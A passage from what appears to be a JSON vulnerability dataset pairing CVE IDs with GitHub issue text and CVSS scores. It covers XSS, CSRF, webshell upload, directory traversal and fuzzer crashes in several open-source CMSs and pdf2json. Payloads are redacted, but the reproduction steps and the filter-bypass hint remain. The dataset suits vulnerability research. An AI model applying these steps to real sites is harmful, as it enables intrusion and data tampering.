        "description": "There is a CSRF vulnerability in Dswjcms NUMBERTAG A CSRF vulnerability exists in Dswjcms NUMBERTAG allowing an attacker to add administrator users via the PATHTAG After the administrator user logged in ,open the following page that can add a administrator user Exp: CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.7,
        "impactScore": 3.6,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2020-19274",
        "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/3",
        "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/3",
        "Repo_new": "shaogongbra/dhcms",
        "Issue_Created_At": "2019-10-11T00:41:21Z",
        "description": "Dhcms Stored XSS Vulnerabilities_in guestbook. Holes for details: in guestbook POST: CODETAG FILETAG you can Executed alert\u3002 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19275",
        "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/4",
        "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/4",
        "Repo_new": "shaogongbra/dhcms",
        "Issue_Created_At": "2019-10-11T01:26:42Z",
        "description": "dhcms Physical path leak. Vulnerability details NUMBERTAG Enter invalid content after the normal file, causing an error\u3002 url: URLTAG FILETAG NUMBERTAG Any file is fine, just enter invalid characters at the back\u3002 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19280",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/9",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/9",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:15:13Z",
        "description": "Jeesns CSRF Vulnerability. There is also no filter for the token and referer check in the global filter, and there is no deletion method, so there is a CSRF vulnerability. Vulnerability recurrence NUMBERTAG First use the A user (admin) to send a Weibo. FILETAG NUMBERTAG Use the B user (jeesns) to comment on the Weibo and bring the admin Weibo delete request. APITAG FILETAG NUMBERTAG When the A user (admin) refreshes the Weibo again, the Weibo will be deleted by the A user without their knowledge. FILETAG It can be seen that the CSRF TEST microblog has been deleted and the CSRF exploit is successful. There is also a CSRF vulnerability when the background administrator adds a new administrator. The poc can be constructed this way. CODETAG When the background administrator accesses this file, the user jeesns is automatically authorized for administrative rights.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19281",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/12",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/12",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:19:09Z",
        "description": "Jeesns Administrator login Store XSS. Vulnerability recurrence NUMBERTAG Open the background login page APITAG NUMBERTAG Fill in the XSS payload APITAG in the username, enter the password as you like, and click Login. FILETAG NUMBERTAG Trigger XSS when the administrator clicks on the member log. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19282",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/11",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/11",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:17:46Z",
        "description": "Jeesns Error Reminder Reflecting XSS. Vulnerability recurrence ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19283",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/10",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/10",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:16:29Z",
        "description": "Jeesns APITAG Reflection XSS. Vulnerability recurrence APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19284",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/15",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/15",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:22:58Z",
        "description": "Jeesns Group\u2018s Comments Store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Fill in the group post comments with XSS payload APITAG FILETAG NUMBERTAG Trigger XSS when viewing posts. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19285",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/14",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/14",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:21:20Z",
        "description": "Jeesns Group Store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Apply for the group and fill in the name XS payload APITAG FILETAG NUMBERTAG The application group needs to be reviewed, and the XSS is triggered when the background administrator views the group application. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19286",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/13",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/13",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:20:15Z",
        "description": "Jeesns Answer Store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Answer the question, click on the source in the editor and fill in the XSS payload APITAG FILETAG NUMBERTAG Trigger XSS when viewing the question. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19287",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/16",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/16",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:24:02Z",
        "description": "Jeesns Group Posts Store XSS. Vulnerability recurrence NUMBERTAG Register a user at the front desk and follow the group NUMBERTAG Post, fill in the XSS payload APITAG at the title. FILETAG NUMBERTAG Trigger XSS when viewing group posts. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19288",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/17",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/17",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:25:03Z",
        "description": "Jeesns Message Store XSS. Vulnerability recurrence NUMBERTAG Register a user at the front desk NUMBERTAG Send a private message to the administrator, fill in the content XS payload APITAG FILETAG NUMBERTAG SS is triggered when the administrator views the private message. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19289",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/18",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/18",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:26:07Z",
        "description": "Jeesns Album Store XSS. Vulnerability recurrence NUMBERTAG Register a user, open the personal center, and click on the gallery NUMBERTAG Create a new album and fill in the XSS payload APITAG . FILETAG NUMBERTAG Trigger XSS when viewing the album. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19290",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/20",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/20",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:28:13Z",
        "description": "Jeesns Weibo Comments store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Fill in the XSS payload APITAG in the Weibo comment section. FILETAG NUMBERTAG Trigger XSS when viewing the details of the Weibo. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19291",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/19",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/19",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:27:13Z",
        "description": "Jeesns Weibo store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Post the Weibo and fill in the XSS payload APITAG . FILETAG NUMBERTAG Trigger XSS when viewing the Weibo. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19292",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/24",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/24",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:31:22Z",
        "description": "Jeesns Question Store XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Post a question and fill in the XSS payload APITAG . FILETAG NUMBERTAG Trigger XSS when viewing the question. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19293",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/22",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/22",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:29:48Z",
        "description": "Jeesns Article Store XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Post the article and fill in the XSS payload APITAG . FILETAG NUMBERTAG Posting an article requires review, and XSS is triggered when the background administrator views the article. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19294",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/23",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/23",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:30:33Z",
        "description": "Jeesns Article Comments Store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Fill in the article comments with XSS payload APITAG FILETAG NUMBERTAG Trigger XSS when viewing the article. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19295",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/21",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/21",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2019-05-14T07:28:52Z",
        "description": "Jeesns Weibo Topic Reflection XSS. Vulnerability recurrence APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19301",
        "Issue_Url_old": "https://github.com/tingyuu/vaeThink/issues/1",
        "Issue_Url_new": "https://github.com/tingyuu/vaethink/issues/1",
        "Repo_new": "tingyuu/vaethink",
        "Issue_Created_At": "2019-05-14T13:00:14Z",
        "description": "There is an Arbitrary Code Execution Vulnerability. Vulnerability description: There is a vulnerability which allows remote attackers to execute arbitrary code. The user can control the value of the field 'condition' of the database table 'vae_admin_rule', which is used for the parameters of the code execution function in the administrator privilege check module. Payload: ERRORTAG POC: Firstly, we put the payload into the place as follows: FILETAG Then we create a new role group, which has limited privileges: FILETAG And we create a user that belongs to this role group: FILETAG We login as 'test', and it's obvious that user 'test' has no privilege to access any page: FILETAG But the payload has been executed when the system checked the privileges: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19302",
        "Issue_Url_old": "https://github.com/tingyuu/vaeThink/issues/2",
        "Issue_Url_new": "https://github.com/tingyuu/vaethink/issues/2",
        "Repo_new": "tingyuu/vaethink",
        "Issue_Created_At": "2019-05-14T13:14:44Z",
        "description": "There is an Arbitrary File Upload Vulnerability. Vulnerability description: There is an arbitrary file upload vulnerability which allows remote attackers to execute arbitrary code. The system server does not perform file suffix detection on the administrator avatar upload function. POC: FILETAG FILETAG We change the filename to \"t.php\": FILETAG The webshell has been uploaded: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19303",
        "Issue_Url_old": "https://github.com/houdunwang/hdcms/issues/6",
        "Issue_Url_new": "https://github.com/houdunwang/hdcms/issues/6",
        "Repo_new": "houdunwang/hdcms",
        "Issue_Created_At": "2019-06-29T01:16:39Z",
        "description": "There is an Arbitrary Code Execution vulnerability. In hdcms NUMBERTAG attacker can upload evil file via PATHTAG which leads to Arbitrary Code Execution vulnerability. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19304",
        "Issue_Url_old": "https://github.com/MRdoulestar/CodeAnalyse/issues/1",
        "Issue_Url_new": "https://github.com/mrdoulestar/codeanalyse/issues/1",
        "Repo_new": "mrdoulestar/codeanalyse",
        "Issue_Created_At": "2020-01-15T02:46:02Z",
        "description": "APITAG NUMBERTAG Directory Traversal. Vulnerability Name: Metinfo CMS Background Directory Traversal Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG The developer use str_replace to delete '../' in APITAG , but this is not safe enough becase it can be bypassed by PATHTAG or '....//'. FILETAG Payload FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19305",
        "Issue_Url_old": "https://github.com/MRdoulestar/CodeAnalyse/issues/2",
        "Issue_Url_new": "https://github.com/mrdoulestar/codeanalyse/issues/2",
        "Repo_new": "mrdoulestar/codeanalyse",
        "Issue_Created_At": "2020-01-15T03:10:45Z",
        "description": "APITAG NUMBERTAG Arbitrary File Deletion. Vulnerability Name: Metinfo CMS Arbitrary File Deletion Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG The indeximg field is also deleted when the column is deleted in ERRORTAG , and the indeximg field can be arbitrarily specified by the background user (in the function of adding a column picture). FILETAG FILETAG POC FILETAG ERRORTAG Then we delete the column, and the file will be deleted as well. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19463",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/24",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/24",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-27T22:42:03Z",
        "description": "Segmentation fault (stack overflow) on vfprintf. Hi, Our fuzzer found a crash due to a stack overflow bug on the function vfprintf. APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error: End of file inside array Error: End of file inside dictionary Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string ... Error NUMBERTAG Dictionary key must be a name object NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG IO_default_xsputn APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19464",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/25",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/25",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-27T22:46:07Z",
        "description": "Segmentation fault (stack overflow) on APITAG Hi, Our fuzzer found a crash due to a stack overflow bug on the function APITAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json PATHTAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG A2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F7AB: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19465",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/26",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/26",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-27T23:08:39Z",
        "description": "Segmentation fault on APITAG Hi, Our fuzzer found a crash due to an invalid read on the function APITAG APITAG URLTAG Valgrind says ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG D NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG FB NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG D9: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B5FA: APITAG , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B3B4: APITAG , APITAG , APITAG , void ) (in PATHTAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG D NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG FB NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG D9: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B5FA: APITAG , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B3B4: APITAG , APITAG , APITAG , void ) (in PATHTAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19466",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/27",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/27",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-27T23:09:01Z",
